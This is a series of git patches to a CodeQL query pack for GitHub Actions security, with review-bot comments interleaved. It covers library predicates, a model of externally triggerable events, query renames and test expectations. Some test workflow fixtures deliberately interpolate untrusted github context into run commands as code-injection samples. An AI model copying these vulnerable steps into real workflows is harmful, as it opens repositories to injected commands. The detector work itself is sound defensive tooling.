From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 17 May 2024 23:10:29 +0200 Subject: [PATCH 300/707] Add github to json contexts --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 4 ++-- .../Security/CWE-094/.github/workflows/test4.yml | 8 ++++++++ .../query-tests/Security/CWE-094/CodeInjection.expected | 2 ++ .../Security/CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 4 files changed, 16 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 063a3f671a32..d9f7b14edd3b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -178,7 +178,7 @@ private predicate jsonEvent(string context) { reg = [ // json - "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", + "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", "github\\.event\\.inputs", "github\\.event\\.issue", "github\\.event\\.merge_group", @@ -262,7 +262,7 @@ class GitHubEventJsonSource extends RemoteFlowSource { ) or contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and - Utils::normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") + Utils::normalizeExpr(context).regexpMatch(".*\\bgithub(\\.event)?\\b.*") ) ) and flag = "json" diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml index c4380bfa8afa..75bf0527ee8b 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml 
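Review bot: The fallback regex `".*\\bgithub(\\.event)?\\b.*"` now matches any normalized context containing the word `github`, not just `github` and `github.event`: the optional group may be empty and the trailing `\\b` is satisfied by a following `.`, so `github.actor`, `github.ref_name`, `github.repository`-style contexts are also classified as JSON event sources by this branch. If the intent mirrors the first hunk's `reg` list (exactly `github` and `github.event`), anchor it, e.g. `Utils::normalizeExpr(context).regexpMatch("github(\\.event)?")`, or `"(.*\\b)?github(\\.event)?"` if `normalizeExpr` can leave a prefix — I cannot see `normalizeExpr` from here. The old pattern's unescaped `.` in `github.event` is fixed by this change, which is good.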
@@ -17,3 +17,11 @@ jobs: - name: Dump GitHub issue context id: github_issue_step run: echo '${{ toJSON(github.event.issue) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github.event) }}' diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index dc653a074e98..e47c6dd340cb 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | +| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index ab0a69a8fa8b..848e08cf69ed 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
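Review bot: Both added steps reuse `id: github_issue_step`, which the existing step just above already carries; GitHub Actions requires step ids to be unique within a job and its validator rejects the file ("may not be used more than once within the same scope"), so this fixture no longer represents a workflow that could run, even though the extractor still parses it. Give each step its own id and a matching name, e.g. `id: github_context_step` / `name: Dump GitHub context` for `toJSON(github)` and `id: github_event_step` / `name: Dump GitHub event context` for `toJSON(github.event)`.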
@@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | +| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -340,6 +342,8 @@ subpaths | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | +| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | ${{ toJSON(github) }} | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From 313acfcac20a34cee1c078c7534e564e6ac3da71 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 17 May 2024 12:28:06 +0200 Subject: [PATCH 301/707] Add externally triggereable data model and predicates --- ql/lib/codeql/actions/Ast.qll | 2 ++ ql/lib/codeql/actions/ast/internal/Ast.qll | 5 +++++ ql/lib/codeql/actions/dataflow/ExternalFlow.qll | 9 +++++++++ .../internal/ExternalFlowExtensions.qll | 7 ++++++- ql/lib/ext/workflow-models/workflow-models.yml | 17 ++++++++++++++++- 5 files changed, 38 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 1e57c8f3d29d..cab2fc05ac51 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -348,6 +348,8 @@ abstract class Job extends AstNode instanceof JobImpl { predicate isPrivileged() { super.isPrivileged() } + predicate isExternallyTriggerable() { super.isExternallyTriggerable() } + string getARunsOnLabel() { result = super.getARunsOnLabel() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0370b1ca4c3f..46bbcaaf29ef 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -703,6 +703,11 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } + /** Holds if the job can be triggered by an external actor. */ + predicate isExternallyTriggerable() { + externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) + } + /** Holds if the job is privileged. */ predicate isPrivileged() { // the job has privileged runtime permissions diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index a52cc427d359..c46a3ee64a1f 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
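Review bot: `isExternallyTriggerable` holds when *any* trigger event of the job is in the model (`getATriggerEvent` is multi-valued), and the model rows for `workflow_run` and `workflow_call` carry "depending on ..." caveats, so the predicate intentionally over-approximates; the QLDoc `Holds if the job can be triggered by an external actor.` reads as a definite guarantee. Suggest `/** Holds if any of the job's trigger events is one an external actor (e.g. via a fork, issue or comment) can fire; over-approximates for workflow_run/workflow_call, whose exposure depends on the upstream or calling workflow. */`. The public wrapper added to `Job` in `Ast.qll` has no QLDoc at all and could take the same text.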
@@ -38,6 +38,15 @@ predicate contextTriggerDataModel(string trigger, string context_prefix) { Extensions::contextTriggerDataModel(trigger, context_prefix) } +/** + * MaD models for externally triggerable events + * Fields: + * - event: Event name + */ +predicate externallyTriggerableEventsDataModel(string event) { + Extensions::externallyTriggerableEventsDataModel(event) +} + /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 415c02dc1ba1..6c64b72e6b4c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -36,6 +36,11 @@ extensible predicate workflowDataModel( extensible predicate repositoryDataModel(string visibility, string default_branch_name); /** - * Holds if context/trigger mapping exists for the given parameters. + * Holds if a context expression starting with context_prefix is available for a given trigger. */ extensible predicate contextTriggerDataModel(string trigger, string context_prefix); + +/** + * Holds if a given trigger event can be fired by an external actor. + */ +extensible predicate externallyTriggerableEventsDataModel(string event); diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index 404e894a5f8a..ff02589fb844 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -11,7 +11,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: contextTriggerDataModel data: - # This predicate maps triggering events with the github event context available for that event - ["commit_comment", "github.event.comment"] - ["discussion", "github.event.discussion"] - ["discussion_comment", "github.event.comment"] 
@@ -55,3 +54,19 @@ extensions:
 - ["workflow_call", "github.event.review"]
 - ["workflow_call", "github.event.workflow"]
 - ["workflow_call", "github.event.workflow_run"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: externallyTriggerableEventsDataModel
+ data:
+ - ["discussion"]
+ - ["discussion_comment"]
+ - ["fork"]
+ - ["issue_comment"]
+ - ["issues"]
+ - ["pull_request"]
+ - ["pull_request_comment"]
+ - ["pull_request_review"]
+ - ["pull_request_review_comment"]
+ - ["pull_request_target"]
+ - ["workflow_run"] # depending on trigger workflow
+ - ["workflow_call"] # depending on caller
From 5d32071adcacbfeb2ce7b1c1f264f34266ec9f55 Mon Sep 17 00:00:00 2001
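Review bot: The `externallyTriggerableEventsDataModel` rows added in this hunk omit `watch`, which any GitHub user can fire against a public repository by starring it, and the same seems to hold for `gollum` when the wiki is editable by everyone; `fork` is listed, so the omission looks accidental rather than a scoping choice. Conversely `pull_request_comment` does not appear to be a GitHub Actions event name (comments on pull requests arrive as `issue_comment`), so that row is dead data unless the extractor maps it. Because the model is negative-by-default, a missing row silently downgrades findings from Critical to Medium; a one-line comment above the table stating the inclusion criterion, e.g. `# events that a user without write access to the repository can cause to fire`, would make future additions reviewable.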
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 21 May 2024 23:02:34 +0200 Subject: [PATCH 302/707] resolve conflicts --- ql/lib/codeql/actions/Ast.qll | 164 +------------- ql/lib/codeql/actions/Helper.qll | 209 ++++++++++++++++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 134 +++++++---- .../actions/controlflow/internal/Cfg.qll | 25 ++- .../codeql/actions/dataflow/FlowSources.qll | 54 ++--- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 14 +- .../dataflow/internal/DataFlowPrivate.qll | 19 +- .../dataflow/internal/DataFlowPublic.qll | 3 +- .../security/EnvPathInjectionQuery.qll | 4 +- .../actions/security/EnvVarInjectionQuery.qll | 4 +- .../actions/security/PoisonableSteps.qll | 2 +- .../security/UntrustedCheckoutQuery.qll | 12 +- ql/src/Debug/partial.ql | 2 +- ...jection.ql => EnvPathInjectionCritical.ql} | 15 +- ...Injection.ql => EnvPathInjectionMedium.ql} | 11 +- ...njection.ql => EnvVarInjectionCritical.ql} | 13 +- ...rInjection.ql => EnvVarInjectionMedium.ql} | 11 +- ...jection.ql => CommandInjectionCritical.ql} | 17 +- ...Injection.ql => CommandInjectionMedium.ql} | 10 +- ...eInjection.ql => CodeInjectionCritical.ql} | 15 +- ...odeInjection.ql => CodeInjectionMedium.ql} | 12 +- ql/src/Security/CWE-349/CachePoisoning.ql | 12 +- .../CWE-349/CachePoisoningByCodeInjection.ql | 4 +- .../UntrustedCheckoutTOCTOUCritical.ql | 4 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 + ...soning.ql => ArtifactPoisoningCritical.ql} | 15 +- ...oisoning.ql => ArtifactPoisoningMedium.ql} | 10 +- ...itical.ql => UntrustedCheckoutCritical.ql} | 10 +- ...eckoutHigh.ql => UntrustedCheckoutHigh.ql} | 8 +- .../CWE-829/UntrustedCheckoutMedium.ql | 31 +++ ql/test/library-tests/test.ql | 8 +- .../Security/CWE-077/EnvPathInjection.qlref | 1 - ...cted => EnvPathInjectionCritical.expected} | 10 +- .../CWE-077/EnvPathInjectionCritical.qlref | 1 + ...pected => EnvPathInjectionMedium.expected} | 0 .../CWE-077/EnvPathInjectionMedium.qlref | 1 + .../Security/CWE-077/EnvVarInjection.qlref | 
1 - ...ected => EnvVarInjectionCritical.expected} | 22 +- .../CWE-077/EnvVarInjectionCritical.qlref | 1 + ...xpected => EnvVarInjectionMedium.expected} | 0 .../CWE-077/EnvVarInjectionMedium.qlref | 1 + .../CWE-077/PrivilegedEnvPathInjection.qlref | 1 - .../CWE-077/PrivilegedEnvVarInjection.qlref | 1 - .../Security/CWE-078/CommandInjection.qlref | 1 - ...cted => CommandInjectionCritical.expected} | 4 +- .../CWE-078/CommandInjectionCritical.qlref | 1 + ...pected => CommandInjectionMedium.expected} | 0 .../CWE-078/CommandInjectionMedium.qlref | 1 + .../CWE-078/PrivilegedCommandInjection.qlref | 1 - .../.github/actions/action1/action.yml | 7 + .../{ => .github/actions}/action2/action.yml | 0 .../.github/actions/action3/action.yml | 9 + .../.github/actions/action4/action.yml | 7 + .../.github/actions/action5/action.yml | 26 +++ .../.github/workflows/changelog_required.yml | 9 - .../workflows/changelog_required_prt.yml | 9 - .../workflows/composite-action-caller-1.yml | 10 + .../workflows/composite-action-caller-2.yml | 10 + .../workflows/composite-action-caller-3.yml | 14 ++ ...{changelog.yml => reusable-workflow-1.yml} | 17 +- ...g_from_prt.yml => reusable-workflow-2.yml} | 17 +- .../workflows/reusable-workflow-caller-1.yml | 11 + .../workflows/reusable-workflow-caller-2.yml | 10 + .../Security/CWE-094/CodeInjection.qlref | 1 - ...xpected => CodeInjectionCritical.expected} | 191 ++++++++-------- .../CWE-094/CodeInjectionCritical.qlref | 1 + ....expected => CodeInjectionMedium.expected} | 43 +++- .../CWE-094/CodeInjectionMedium.qlref | 1 + .../CWE-094/PrivilegedCodeInjection.qlref | 1 - .../CWE-367/.github/workflows/actor.yml | 21 ++ .../Security/CWE-829/ArtifactPoisoning.qlref | 2 - ...ted => ArtifactPoisoningCritical.expected} | 26 +-- .../CWE-829/ArtifactPoisoningCritical.qlref | 2 + ...ected => ArtifactPoisoningMedium.expected} | 0 .../CWE-829/ArtifactPoisoningMedium.qlref | 2 + .../CWE-829/PrivilegedArtifactPoisoning.qlref | 2 - 
.../PrivilegedUntrustedCheckoutCritical.qlref | 1 - .../PrivilegedUntrustedCheckoutHigh.qlref | 1 - ...ted => UntrustedCheckoutCritical.expected} | 0 .../CWE-829/UntrustedCheckoutCritical.qlref | 1 + ...xpected => UntrustedCheckoutHigh.expected} | 0 .../CWE-829/UntrustedCheckoutHigh.qlref | 1 + .../CWE-829/UntrustedCheckoutMedium.expected | 0 .../CWE-829/UntrustedCheckoutMedium.qlref | 1 + 84 files changed, 812 insertions(+), 544 deletions(-) create mode 100644 ql/lib/codeql/actions/Helper.qll rename ql/src/Security/CWE-077/{PrivilegedEnvPathInjection.ql => EnvPathInjectionCritical.ql} (74%) rename ql/src/Security/CWE-077/{EnvPathInjection.ql => EnvPathInjectionMedium.ql} (78%) rename ql/src/Security/CWE-077/{PrivilegedEnvVarInjection.ql => EnvVarInjectionCritical.ql} (77%) rename ql/src/Security/CWE-077/{EnvVarInjection.ql => EnvVarInjectionMedium.ql} (80%) rename ql/src/Security/CWE-078/{PrivilegedCommandInjection.ql => CommandInjectionCritical.ql} (59%) rename ql/src/Security/CWE-078/{CommandInjection.ql => CommandInjectionMedium.ql} (79%) rename ql/src/Security/CWE-094/{PrivilegedCodeInjection.ql => CodeInjectionCritical.ql} (68%) rename ql/src/Security/CWE-094/{CodeInjection.ql => CodeInjectionMedium.ql} (77%) rename ql/src/Security/CWE-829/{PrivilegedArtifactPoisoning.ql => ArtifactPoisoningCritical.ql} (64%) rename ql/src/Security/CWE-829/{ArtifactPoisoning.ql => ArtifactPoisoningMedium.ql} (77%) rename ql/src/Security/CWE-829/{PrivilegedUntrustedCheckoutCritical.ql => UntrustedCheckoutCritical.ql} (85%) rename ql/src/Security/CWE-829/{PrivilegedUntrustedCheckoutHigh.ql => UntrustedCheckoutHigh.ql} (87%) create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql delete mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref rename ql/test/query-tests/Security/CWE-077/{PrivilegedEnvPathInjection.expected => EnvPathInjectionCritical.expected} (71%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref 
rename ql/test/query-tests/Security/CWE-077/{EnvPathInjection.expected => EnvPathInjectionMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref rename ql/test/query-tests/Security/CWE-077/{PrivilegedEnvVarInjection.expected => EnvVarInjectionCritical.expected} (71%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-077/{EnvVarInjection.expected => EnvVarInjectionMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjection.qlref rename ql/test/query-tests/Security/CWE-078/{PrivilegedCommandInjection.expected => CommandInjectionCritical.expected} (61%) create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-078/{CommandInjection.expected => CommandInjectionMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml rename ql/test/query-tests/Security/CWE-094/{ => .github/actions}/action2/action.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml delete mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml delete 
mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml rename ql/test/query-tests/Security/CWE-094/.github/workflows/{changelog.yml => reusable-workflow-1.yml} (90%) rename ql/test/query-tests/Security/CWE-094/.github/workflows/{changelog_from_prt.yml => reusable-workflow-2.yml} (90%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml delete mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjection.qlref rename ql/test/query-tests/Security/CWE-094/{PrivilegedCodeInjection.expected => CodeInjectionCritical.expected} (65%) create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-094/{CodeInjection.expected => CodeInjectionMedium.expected} (74%) create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml delete mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref rename ql/test/query-tests/Security/CWE-829/{PrivilegedArtifactPoisoning.expected => ArtifactPoisoningCritical.expected} (73%) create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref rename ql/test/query-tests/Security/CWE-829/{ArtifactPoisoning.expected => ArtifactPoisoningMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref delete mode 
100644 ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref rename ql/test/query-tests/Security/CWE-829/{PrivilegedUntrustedCheckoutCritical.expected => UntrustedCheckoutCritical.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref rename ql/test/query-tests/Security/CWE-829/{PrivilegedUntrustedCheckoutHigh.expected => UntrustedCheckoutHigh.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cab2fc05ac51..9be2580f36e9 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -1,160 +1,6 @@ private import codeql.actions.ast.internal.Ast private import codeql.Locations - -module Utils { - bindingset[expr] - string normalizeExpr(string expr) { - result = - expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") - .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") - .regexpReplaceAll("\\s*\\.\\s*", ".") - } - - bindingset[regex] - string wrapRegexp(string regex) { - result = - [ - "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", - "toJSON\\(\\s*" + regex + "\\s*\\)" - ] - } - - bindingset[str] - private string trimQuotes(string str) { - result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") - } - - bindingset[line, var] - predicate extractLineAssignment(string line, string var, string key, string value) { - exists(string assignment | - // single line assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + - var.toUpperCase() + "(\\})?(\"|')?", 2) and - count(assignment.splitAt("=")) = 2 and - key = trimQuotes(assignment.splitAt("=", 0)) and - value = trimQuotes(assignment.splitAt("=", 1)) - or - // workflow command assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + - "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and - key = trimQuotes(assignment.splitAt("::", 0)) and - value = trimQuotes(assignment.splitAt("::", 1)) - ) - } - - bindingset[var] - private string multilineAssignmentRegex(string var) { - // eg: - // echo "PR_TITLE<> $GITHUB_ENV - // echo "$TITLE" >> $GITHUB_ENV - // echo "EOF" >> $GITHUB_ENV - result = - ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" - } - - bindingset[var] - private string multilineBlockAssignmentRegex(string var) { - // eg: - // { - // echo 'JSON_RESPONSE<> "$GITHUB_ENV" - 
// echo EOF - // } >> "$GITHUB_ENV" - result = - ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" - } - - bindingset[var] - private string multilineHereDocAssignmentRegex(string var) { - // eg: - // cat <<-EOF >> "$GITHUB_ENV" - // echo "FOO=$TITLE" - // EOF - result = - ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + - "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" - } - - bindingset[script, var] - predicate extractMultilineAssignment(string script, string var, string key, string value) { - // multiline assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) - ) - or - // multiline block assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) - ) - or - // multiline heredoc assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - 